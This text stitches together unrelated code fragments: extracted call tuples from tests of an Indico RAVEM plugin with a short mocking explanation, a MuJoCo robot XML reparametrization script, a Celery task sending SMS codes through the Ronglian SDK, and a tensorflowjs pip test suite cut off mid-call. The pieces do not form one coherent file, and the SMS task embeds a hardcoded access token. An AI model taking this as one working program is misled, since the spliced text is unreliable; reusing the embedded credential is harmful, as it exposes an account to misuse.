'"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', method=method, param1='test1', param2='test2')\n", (884, 948), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1181, 1192), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1190, 1192), False, 'from unittest.mock import MagicMock\n'), ((1355, 1402), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""access_token"""', 'token'], {}), "('access_token', token)\n", (1379, 1402), False, 'from indico_ravem.plugin import RavemPlugin\n'), 
((1407, 1470), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1421, 1470), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1796, 1807), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1805, 1807), False, 'from unittest.mock import MagicMock\n'), ((1952, 2015), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1966, 2015), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((3738, 3749), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3747, 3749), False, 'from unittest.mock import MagicMock\n'), ((3894, 3949), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""api_endpoint"""', 'root_endpoint'], {}), "('api_endpoint', root_endpoint)\n", (3918, 3949), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((3954, 4010), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['endpoint'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "(endpoint, param1='test1', param2='test2')\n", (3968, 4010), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4367, 4378), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (4376, 4378), False, 'from unittest.mock import MagicMock\n'), ((4523, 4569), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'params': 'params'}), "('test_endpoint', params=params)\n", (4537, 4569), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4815, 4869), 'requests.exceptions.Timeout', 'Timeout', (['"""Timeout test error message"""'], {'request': 'request'}), "('Timeout test error message', request=request)\n", (4822, 4869), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((5725, 5783), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (5737, 5783), False, 'from indico.testing.util import extract_logs\n'), ((6559, 6570), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (6568, 6570), False, 'from unittest.mock import MagicMock\n'), ((6615, 6653), 'requests.exceptions.HTTPError', 'HTTPError', (['"""Well this is embarrassing"""'], {}), "('Well this is embarrassing')\n", (6624, 6653), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((6945, 7003), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (6957, 7003), False, 'from indico.testing.util import extract_logs\n'), ((7312, 7323), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7321, 7323), False, 'from unittest.mock import MagicMock\n'), ((7606, 7617), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7615, 7617), False, 'from unittest.mock import MagicMock\n'), ((8151, 8162), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8160, 8162), False, 'from unittest.mock import MagicMock\n'), ((8214, 8242), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8223, 8242), False, 'from unittest.mock import MagicMock\n'), ((8462, 8487), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), 
'(event_vc_room)\n', (8472, 8487), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((8853, 8864), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8862, 8864), False, 'from unittest.mock import MagicMock\n'), ((8916, 8944), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8925, 8944), False, 'from unittest.mock import MagicMock\n'), ((9102, 9127), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (9112, 9127), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4880, 4902), 'pytest.raises', 'pytest.raises', (['Timeout'], {}), '(Timeout)\n', (4893, 4902), False, 'import pytest\n'), ((4923, 4954), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {}), "('test_endpoint')\n", (4937, 4954), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((5557, 5582), 'pytest.raises', 'pytest.raises', (['IndexError'], {}), '(IndexError)\n', (5570, 5582), False, 'import pytest\n'), ((5603, 5659), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (5617, 5659), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((6485, 6525), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (6509, 6525), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((6771, 6795), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\n', (6784, 6795), False, 'import pytest\n'), ((6816, 6872), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (6830, 6872), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7377, 7402), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7387, 7402), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7676, 7701), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7686, 7701), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7085, 7125), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (7109, 7125), False, 'from indico_ravem.plugin import RavemPlugin\n')]
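Every test above follows the same pattern: patch requests.request where indico_ravem.util looks it up, and hand back a MagicMock shaped like a requests.Response. The pattern is isolated below as a minimal sketch; the endpoint name 'my_endpoint' and the parameters are illustrative, and the db fixture used by the real tests is omitted.

# Minimal form of the mocking pattern used throughout the tests above.
from unittest.mock import MagicMock
from indico_ravem.util import ravem_api_call

def test_my_endpoint(mocker):                        # hypothetical test name
    request = mocker.patch('indico_ravem.util.requests.request')
    response = MagicMock()
    response.json.return_value = {'result': 'ok'}    # fake JSON body
    response.raise_for_status.return_value = False   # pretend HTTP 2xx
    request.return_value = response

    ravem_api_call('my_endpoint', params={'room': 'B28'})

    assert request.call_count == 1
    assert request.call_args[1]['params'] == {'room': 'B28'}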
import numpy as np import xml.etree.ElementTree as ET class Geom(object): def __init__(self, geom): self.xml = geom self.params = [] def get_params(self): return self.params.copy() def set_params(self, new_params): self.params = new_params def update_point(self, p, new_params): pass def update_xml(self): pass def update(self, new_params): self.set_params(new_params) self.update_xml() def get_smallest_z(self): pass def get_param_limits(self): pass def get_param_names(self): pass def get_volume(self): pass class Sphere(Geom): min_radius = .05 max_radius = .4 def __init__(self, geom): self.xml = geom self.params = [float(self.xml.get('size'))] # radius self.center = np.array([float(x) for x in self.xml.get('pos').split()]) def update_point(self, p, new_params): return ((p - self.center) * new_params[0] / self.params[0]) + self.center def update_xml(self): self.xml.set('size', str(self.params[0])) def get_smallest_z(self): return self.center[2] - self.params[0] def get_param_limits(self): return [[self.min_radius], [self.max_radius]] def get_param_names(self): return ['radius'] def get_volume(self): return 4./3. * np.pi * self.params[0] ** 3 class Capsule(Geom): min_length = 0.175 max_length = 0.8 min_radius = 0.035 max_radius = 0.085 def __init__(self, geom): self.xml = geom fromto = [float(x) for x in self.xml.get('fromto').split()] self.p1 = np.array(fromto[:3]) self.p2 = np.array(fromto[3:]) length = np.sqrt(np.sum((self.p2 - self.p1) ** 2)) radius = float(self.xml.get('size')) self.params = [length, radius] self.axis = (self.p2 - self.p1) / length def update_point(self, p, new_params): lfac = p.dot(self.axis) * self.axis rfac = p - lfac return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1]) def update_xml(self): self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])])) self.xml.set('size', str(self.params[1])) # radius def set_params(self, new_params): p1 = self.update_point(self.p1, new_params) p2 = self.update_point(self.p2, new_params) # update only after computing p1, p2 self.p1 = p1 self.p2 = p2 super().set_params(new_params) def get_smallest_z(self): return min(self.p1[2], self.p2[2]) - self.params[1] def get_param_limits(self): return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]] def get_param_names(self): return ['length','radius'] def get_volume(self): return 4./3. 
* np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2 class Body: geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types def __init__(self, body, worldbody=False): self.xml = body self.worldbody = worldbody geom_xml = body.find('geom') # assume only one geometry per body self.geom = self.geoms[geom_xml.get('type')](geom_xml) self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')] self.parts = [Body(b) for b in body.findall('body')] pos = [b.get('pos') for b in body.findall('body')] self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos] pos = [j.get('pos') for j in self.joints] self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos] self.n = len(self.geom.get_params()) self.n_all_params = len(self.get_params()) self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height() def get_height(self): max_height = -self.geom.get_smallest_z() for body, pos in zip(self.parts, self.part_positions): max_height = max(max_height, body.get_height() - pos[2]) return max_height def update_initial_position(self): pos = self.xml.get("pos").split() pos[2] = str(self.get_height() + self.zmin) self.xml.set("pos", ' '.join(pos)) def update_xml(self): for body, pos in zip(self.parts, self.part_positions): body.xml.set('pos', ' '.join([str(x) for x in pos])) for joint, pos in zip(self.joints, self.joint_positions): joint.set('pos', ' '.join([str(x) for x in pos])) def set_body_positions(self, new_params): for i, pos in enumerate(self.part_positions): self.part_positions[i] = self.geom.update_point(pos, new_params) for i, pos in enumerate(self.joint_positions): self.joint_positions[i] = self.geom.update_point(pos, new_params) def update(self, new_params): self.set_body_positions(new_params) self.geom.update(new_params) self.update_xml() def get_params(self): params = self.geom.get_params() for body in self.parts: params += body.get_params() return params def get_param_limits(self): limits = self.geom.get_param_limits() for body in self.parts: body_limits = body.get_param_limits() limits[0] += body_limits[0] limits[1] += body_limits[1] return limits def get_param_names(self): name = self.xml.get('name') param_names = [name + '-' + p for p in self.geom.get_param_names()] for body in self.parts: param_names += body.get_param_names() return param_names def update_params(self, new_params): if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters" self.update(new_params[:self.n]) remaining_params = new_params[self.n:] for body in self.parts: remaining_params = body.update_params(remaining_params) if self.worldbody: self.update_initial_position() else: return remaining_params def get_body_names(self): names = [self.xml.get('name')] for body in self.parts: names += body.get_names() return names def get_joints(self): joints = {} for body,pos in zip(self.parts, self.part_positions): for j in body.joints: joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos) joints.update(body.get_joints()) return joints def get_volumes(self): volumes = {} if len(self.joints) > 0: for j in self.joints: v1 = self.geom.get_volume() v2 = sum([b.geom.get_volume() for b in self.parts]) volumes[j.get('name')] = np.array((v1, v2)) for body in self.parts: volumes.update(body.get_volumes()) return volumes class MuJoCoXmlRobot: def __init__(self, model_xml): self.model_xml = model_xml self.tree = ET.parse(self.model_xml) worldbody = 
self.tree.getroot().find('worldbody') self.body = Body(worldbody.find('body'), worldbody=True) def get_params(self): return self.body.get_params() def get_param_limits(self): return self.body.get_param_limits() def get_param_names(self): return self.body.get_param_names() def get_height(self): return self.body.get_height() def get_joints(self): return self.body.get_joints() def get_volumes(self): return self.body.get_volumes() def update(self, params, xml_file=None): if xml_file is None: xml_file = self.model_xml self.body.update_params(list(params)) self.tree.write(xml_file) if __name__ == '__main__': robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml') params = list(1.0 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/hopper_test.xml') assert robot.get_params() == params #assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml') params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06] robot.update(params, 'mujoco_assets/walker2d_test.xml') assert robot.get_params() == params assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/ant.xml') params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06] robot.update(params, 'mujoco_assets/ant_test.xml') assert robot.get_params() == params assert robot.get_height() == .2 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml') params = list(.8 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/humanoid_test.xml') assert robot.get_params() == params print(robot.get_height()) #assert robot.get_height() == .6085 print(robot.get_param_limits()) print(robot.get_param_names()) import gym, roboschool env = gym.make("RoboschoolHopper-v1") env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml' env.reset() #env.render() import os from scipy.misc import imsave import subprocess as sp outdir = 'xml_vid' os.makedirs(outdir, exist_ok=True) i = 0 for _ in range(10): env.reset() for _ in range(100): env.step(env.action_space.sample()) rgb = env.render('rgb_array') imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb) i+=1 sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')]) env.close()
[ "xml.etree.ElementTree.parse", "os.makedirs", "os.path.join", "numpy.sum", "numpy.array", "numpy.concatenate", "gym.make" ]
[((9394, 9425), 'gym.make', 'gym.make', (['"""RoboschoolHopper-v1"""'], {}), "('RoboschoolHopper-v1')\n", (9402, 9425), False, 'import gym, roboschool\n'), ((9625, 9659), 'os.makedirs', 'os.makedirs', (['outdir'], {'exist_ok': '(True)'}), '(outdir, exist_ok=True)\n', (9636, 9659), False, 'import os\n'), ((1671, 1691), 'numpy.array', 'np.array', (['fromto[:3]'], {}), '(fromto[:3])\n', (1679, 1691), True, 'import numpy as np\n'), ((1710, 1730), 'numpy.array', 'np.array', (['fromto[3:]'], {}), '(fromto[3:])\n', (1718, 1730), True, 'import numpy as np\n'), ((7208, 7232), 'xml.etree.ElementTree.parse', 'ET.parse', (['self.model_xml'], {}), '(self.model_xml)\n', (7216, 7232), True, 'import xml.etree.ElementTree as ET\n'), ((1756, 1788), 'numpy.sum', 'np.sum', (['((self.p2 - self.p1) ** 2)'], {}), '((self.p2 - self.p1) ** 2)\n', (1762, 1788), True, 'import numpy as np\n'), ((9977, 10009), 'os.path.join', 'os.path.join', (['outdir', '"""%05d.png"""'], {}), "(outdir, '%05d.png')\n", (9989, 10009), False, 'import os\n'), ((10056, 10087), 'os.path.join', 'os.path.join', (['outdir', '"""out.mp4"""'], {}), "(outdir, 'out.mp4')\n", (10068, 10087), False, 'import os\n'), ((6973, 6991), 'numpy.array', 'np.array', (['(v1, v2)'], {}), '((v1, v2))\n', (6981, 6991), True, 'import numpy as np\n'), ((2228, 2262), 'numpy.concatenate', 'np.concatenate', (['[self.p1, self.p2]'], {}), '([self.p1, self.p2])\n', (2242, 2262), True, 'import numpy as np\n')]
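The Geom/Body/MuJoCoXmlRobot classes above reparametrize a MuJoCo XML in place. The sketch below shows the core workflow (load, scale, clip, write); the asset path matches the __main__ block, while the np.clip step against the reported limits is an extra safety measure, not something the original script does.

# Workflow sketch for the classes above, under the assumptions stated.
import numpy as np

robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml')
lo, hi = robot.get_param_limits()
params = np.clip(1.2 * np.array(robot.get_params()), lo, hi)  # scale geoms by 20%
robot.update(list(params), 'mujoco_assets/hopper_scaled.xml')
print(dict(zip(robot.get_param_names(), robot.get_params())))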
from ronglian_sms_sdk import SmsSDK
from celery_tasks.main import app


# Define our task (function).
# A task must be decorated with the Celery instance's task decorator.
# Tasks in the task package rely on Celery's autodiscovery (configured in main).
@app.task
def celery_send_sms_code(mobile, sms_code):
    accId = '<KEY>'
    accToken = '514a8783b8c2481ebbeb6a814434796f'
    appId = '<KEY>'
    # 9.1. Create the Ronglian Cloud SDK instance
    sdk = SmsSDK(accId, accToken, appId)
    tid = '1'  # SMS template id; only 1 is allowed because we are a test account
    mobile = '%s' % mobile  # 'phone1,phone2' - recipients; test accounts may only send to test numbers
    datas = (sms_code, 10)  # ('var1', 'var2') - the variables used by the template
    # Template: "Your verification code is {1}, please enter it within {2} minutes"
    # e.g. "Your verification code is 666999, please enter it within 5 minutes"
    # 9.2. Send the SMS
    sdk.sendMessage(tid, mobile, datas)
[ "ronglian_sms_sdk.SmsSDK" ]
[((326, 356), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', (['accId', 'accToken', 'appId'], {}), '(accId, accToken, appId)\n', (332, 356), False, 'from ronglian_sms_sdk import SmsSDK\n')]
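Since celery_send_sms_code above is a Celery task, callers queue it instead of calling it directly. The sketch below uses Celery's standard .delay(); the import path 'celery_tasks.sms.tasks' and the surrounding verification-code logic are assumptions for illustration.

# How a caller (e.g. a view) would queue the task above.
import random

from celery_tasks.sms.tasks import celery_send_sms_code   # assumed module path

mobile = '13800000000'                          # placeholder test number
sms_code = '%06d' % random.randint(0, 999999)   # random 6-digit code
celery_send_sms_code.delay(mobile, sms_code)    # runs in a Celery worker, not in-process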
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Test the Python API and shell binary of the tensorflowjs pip package.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import glob import json import os import shutil import subprocess import sys import tempfile import unittest import numpy as np import tensorflow as tf from tensorflow import keras from tensorflow.python.eager import def_function from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import tensor_spec from tensorflow.python.ops import variables from tensorflow.python.training.tracking import tracking from tensorflow.python.saved_model.save import save import tensorflow_hub as hub import tensorflowjs as tfjs def _createKerasModel(layer_name_prefix, h5_path=None): """Create a Keras model for testing. Args: layer_name_prefix: A prefix string for layer names. This helps avoid clashes in layer names between different test methods. h5_path: Optional string path for a HDF5 (.h5) file to save the model in. Returns: An instance of keras.Model. """ input_tensor = keras.layers.Input((3, )) dense1 = keras.layers.Dense( 4, use_bias=True, kernel_initializer='ones', bias_initializer='zeros', name=layer_name_prefix + '1')(input_tensor) output = keras.layers.Dense( 2, use_bias=False, kernel_initializer='ones', name=layer_name_prefix + '2')(dense1) model = keras.models.Model(inputs=[input_tensor], outputs=[output]) if h5_path: model.save(h5_path) return model def _createTensorFlowSavedModelV1(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. """ graph = tf.Graph() with graph.as_default(): with tf.compat.v1.name_scope(name_scope): x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]]) w = tf.compat.v1.get_variable('w', shape=[2, 2]) y = tf.compat.v1.matmul(x, w) output = tf.compat.v1.nn.softmax(y) init_op = w.initializer # Create a builder. builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path) with tf.compat.v1.Session() as sess: # Run the initializer on `w`. sess.run(init_op) builder.add_meta_graph_and_variables( sess, [tf.compat.v1.saved_model.tag_constants.SERVING], signature_def_map={ "serving_default": tf.compat.v1.saved_model.signature_def_utils.predict_signature_def( inputs={"x": x}, outputs={"output": output}) }, assets_collection=None) builder.save() def _createTensorFlowSavedModel(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. 
""" input_data = constant_op.constant(1., shape=[1]) root = tracking.AutoTrackable() root.v1 = variables.Variable(3.) root.v2 = variables.Variable(2.) root.f = def_function.function(lambda x: root.v1 * root.v2 * x) to_save = root.f.get_concrete_function(input_data) save(root, save_path, to_save) def _create_hub_module(save_path): """Create a TensorFlow Hub module for testing. Args: save_path: The directory path in which to save the model. """ # Module function that doubles its input. def double_module_fn(): w = tf.Variable([2.0, 4.0]) x = tf.compat.v1.placeholder(dtype=tf.float32) hub.add_signature(inputs=x, outputs=x*w) graph = tf.Graph() with graph.as_default(): spec = hub.create_module_spec(double_module_fn) m = hub.Module(spec) # Export the module. with tf.compat.v1.Session(graph=graph) as sess: sess.run(tf.compat.v1.global_variables_initializer()) m.export(save_path, sess) class APIAndShellTest(tf.test.TestCase): """Tests for the Python API of the pip package.""" @classmethod def setUpClass(cls): cls.class_tmp_dir = tempfile.mkdtemp() cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model') cls.tf_saved_model_v1_dir = os.path.join( cls.class_tmp_dir, 'tf_saved_model_v1') _createTensorFlowSavedModel('a', cls.tf_saved_model_dir) _createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir) cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module') _create_hub_module(cls.tf_hub_module_dir) @classmethod def tearDownClass(cls): shutil.rmtree(cls.class_tmp_dir) def setUp(self): # Make sure this file is not being run from the source directory, to # avoid picking up source files. if os.path.isdir( os.path.join(os.path.dirname(__file__), 'tensorflowjs')): self.fail('Do not run this test from the Python source directory. ' 'This file is intended to be run on pip install.') self._tmp_dir = tempfile.mkdtemp() super(APIAndShellTest, self).setUp() def tearDown(self): if os.path.isdir(self._tmp_dir): shutil.rmtree(self._tmp_dir) super(APIAndShellTest, self).tearDown() def testVersionString(self): self.assertEqual(2, tfjs.__version__.count('.')) def testSaveKerasModel(self): with self.test_session(): # First create a toy keras model. model = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model, self._tmp_dir) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json')) as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. 
weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDense1/kernel', 'MergedDense1/bias', 'MergedDense2/kernel' ])) self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDense1/bias'], [4]) self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32') def testLoadKerasModel(self): # Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision. with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. model1 = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model1, self._tmp_dir) model1_weight_values = model1.get_weights() with tf.Graph().as_default(), tf.compat.v1.Session(): # Load the model from saved artifacts. model2 = tfjs.converters.load_keras_model( os.path.join(self._tmp_dir, 'model.json')) # Compare the loaded model with the original one. model2_weight_values = model2.get_weights() self.assertEqual(len(model1_weight_values), len(model2_weight_values)) for model1_weight_value, model2_weight_value in zip( model1_weight_values, model2_weight_values): self.assertAllClose(model1_weight_value, model2_weight_value) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*'))) def testInvalidInputFormatRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'nonsensical_format', self._tmp_dir, self._tmp_dir ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'--input_format', tf.compat.as_bytes(stderr)) def testMissingInputPathRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'input_path', tf.compat.as_bytes(stderr)) def testKerasH5ConversionWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. 
weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there is only one weight group due to the default # non-split_weights_by_layer behavior. The model is a small one, which # does not exceed the 4-MB shard size limit. Therefore, there should # be only one weight file. self.assertEqual( 1, len(glob.glob(os.path.join(self._tmp_dir, 'group*')))) def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', '--split_weights_by_layer', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there are two weight groups due to the optional flag # --split_weights_by_layer behavior. The model is a small one. None of # the layers should have weight sizes exceeding the 4-MB shard size # limit. 
      self.assertEqual(
          2, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))

  def testKerasH5ConversionWithSignatureNameErrors(self):
    process = subprocess.Popen(
        [
            'tensorflowjs_converter', '--input_format', 'keras',
            '--signature_name', 'bar',
            os.path.join(self._tmp_dir, 'foo.h5'),
            os.path.join(self._tmp_dir, 'output')
        ],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    _, stderr = process.communicate()
    self.assertGreater(process.returncode, 0)
    self.assertIn(
        b'The --signature_name flag is applicable only to',
        tf.compat.as_bytes(stderr))

  def testConvertTFSavedModelV1WithCommandLineWorks(self):
    output_dir = os.path.join(self._tmp_dir)
    process = subprocess.Popen([
